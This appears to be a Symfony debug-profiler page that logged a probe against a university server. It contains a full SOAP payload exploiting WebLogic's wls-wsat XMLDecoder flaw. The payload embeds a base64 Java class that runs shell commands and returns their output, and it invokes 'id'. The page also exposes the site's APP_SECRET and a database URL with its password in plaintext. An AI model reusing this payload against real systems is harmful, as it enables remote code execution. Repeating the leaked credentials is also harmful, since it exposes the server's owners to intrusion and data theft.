n/a
Request
GET Parameters
No GET parameters
POST Parameters
No POST parameters
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _remove_csp_headers | true |
| _stopwatch_token | "e50d43" |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| accept-encoding | "gzip, deflate" |
| accept-language | "zh-CN,zh;q=0.9,en;q=0.8" |
| connection | "close" |
| content-length | "4036" |
| content-type | "text/xml" |
| host | "rad-sdsc.ucsd.edu" |
| user-agent | "WMS/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" |
| x-php-ob-level | "1" |
Request Content
Raw
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>id</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Sat, 28 Feb 2026 16:08:29 GMT" |
| x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2Frad-sdsc.ucsd.edu%2Fwls-wsat%2FCoordinatorPortType%22" |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fwebapps%2FFellowshipApplication%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
| x-debug-token | "15af4c" |
| x-debug-token-link | "https://rad-sdsc.ucsd.edu/_profiler/7b1301" |
| x-previous-debug-token | "7b1301" |
| x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "0da11a0b64b06231a4c8bc059d84af49" |
| DATABASE_URL | "postgresql://radfluro:myradpw0!@127.0.0.1:5432/fellowapp28?serverVersion=13&charset=utf8" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "4036" |
| CONTENT_TYPE | "text/xml" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/webapps/FellowshipApplication/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/webapps/FellowshipApplication/public" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_ACCEPT_ENCODING | "gzip, deflate" |
| HTTP_ACCEPT_LANGUAGE | "zh-CN,zh;q=0.9,en;q=0.8" |
| HTTP_CONNECTION | "close" |
| HTTP_HOST | "rad-sdsc.ucsd.edu" |
| HTTP_USER_AGENT | "WMS/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REMOTE_ADDR | "193.32.162.32" |
| REMOTE_PORT | "40066" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1772294909 |
| REQUEST_TIME_FLOAT | 1772294909.2083 |
| REQUEST_URI | "/wls-wsat/CoordinatorPortType" |
| SCRIPT_FILENAME | "/var/www/webapps/FellowshipApplication/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "132.249.119.111" |
| SERVER_ADMIN | "eghobrial@ucsd.edu" |
| SERVER_NAME | "rad-sdsc.ucsd.edu" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "" |
| SERVER_SOFTWARE | "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33" |
| SSL_TLS_SNI | "rad-sdsc.ucsd.edu" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL" |
| UNIQUE_ID | "aaMS-bPf5hv-8Ziei8E@7gAAAA4" |